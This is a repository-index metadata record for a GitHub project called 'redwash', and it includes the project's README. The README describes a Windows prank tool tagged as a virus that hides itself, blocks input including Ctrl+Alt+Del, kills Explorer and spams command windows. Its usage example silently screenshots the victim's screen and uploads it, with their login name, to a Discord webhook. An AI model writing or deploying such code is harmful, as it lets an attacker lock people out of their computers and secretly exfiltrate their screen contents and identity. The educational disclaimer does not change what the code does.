{"id":21355529,"url":"https://github.com/owengregson/redwash","last_synced_at":"2026-05-18T18:40:28.327Z","repository":{"id":215729104,"uuid":"739628150","full_name":"owengregson/redwash","owner":"owengregson","description":"A Python troll script that locks the users screen and jumpscares them.","archived":false,"fork":false,"pushed_at":"2024-01-06T05:46:48.000Z","size":50992,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-01-22T18:09:16.276Z","etag":null,"topics":["logger","no-uac","python","python-script","script","troll","virus","windows-10","windows-11"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"agpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/owengregson.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2024-01-06T03:48:26.000Z","updated_at":"2024-02-05T21:12:56.000Z","dependencies_parsed_at":"2024-01-06T07:02:03.369Z","dependency_job_id":null,"html_url":"https://github.com/owengregson/redwash","commit_stats":null,"previous_names":["owengregson/redwash"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/owengregson%2Fredwash","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/owengregson%2Fredwash/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/owengregson%2Fredwash/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/owengregson%2Fredwash/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/owengregson","download_url":"https://codeload.github.com/owengregson/redwash/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243829469,"owners_count":20354667,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["logger","no-uac","python","python-script","script","troll","virus","windows-10","windows-11"],"created_at":"2024-11-22T04:18:14.425Z","updated_at":"2026-05-18T18:40:28.265Z","avatar_url":"https://github.com/owengregson.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# redwash\nCreated in December 2021 -- Last Modified 12/15/2021\n\nA Python (for Windows) troll script that locks the user's computer and jumpscares them. I made this as a proof-of-concept that Windows gives executables an unusual amount of freedom over the device and is pretty insecure.\nThis program __does not require UAC (Run as administrator)__.\n\n# ⚠️ This code is provided for educational purposes only. I am not liable for any misuse of this script such as using it to collect user data for malicious intent.\n\nHas various optional features:\n* Hide itself when run\n* Block user input (including Ctrl+Alt+Del)\n* Minimize all other running applications\n* Spam open command prompts\n* Kill Windows Explorer\n* Execute other code during runtime (upload screenshot etc.)\n\n![image](redwashed_pc.png)\n\n## Example Usage\n```python\n\"\"\" redwash code implementation goes here... \"\"\"\n\ndef otherCode():\n    # This is an example of some code you can execute in the background when redwash is running.\n    # In this example, we take a screenshot of the user's computer and upload it to a discord webhook.\n\n    # Take a screenshot of the PC\n    screenshot = ImageGrab.grab()\n    buffered = BytesIO()\n    screenshot.save(buffered, format=\"PNG\")\n\n    # Your Discord webhook URL\n    webhook_url = 'your_webhook_url'\n\n    # Prepare the payload\n    files = {'file': ('screenshot.png', buffered.getvalue(), 'image/png')}\n    data = {'payload_json': dumps({\"content\": getlogin() + \" just executed the script!\", \"username\": \"redwash\", \"avatar_url\": \"https://cdn.discordapp.com/attachments/1193058123733282998/1193058403862454282/terxture.png?ex=65ab5539\u0026is=6598e039\u0026hm=05040b88e1d2b6500f983e13bfd262ffee851d8c973d5ff4eb1e8016ea396e6a\u0026\"})}\n\n    # POST request to the Discord webhook\n    res = post(webhook_url, files=files, data=data)\n\nif __name__ == \"__main__\":\n    redwash(True, True, True, True, True, False, otherCode)\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fowengregson%2Fredwash","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fowengregson%2Fredwash","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fowengregson%2Fredwash/lists"}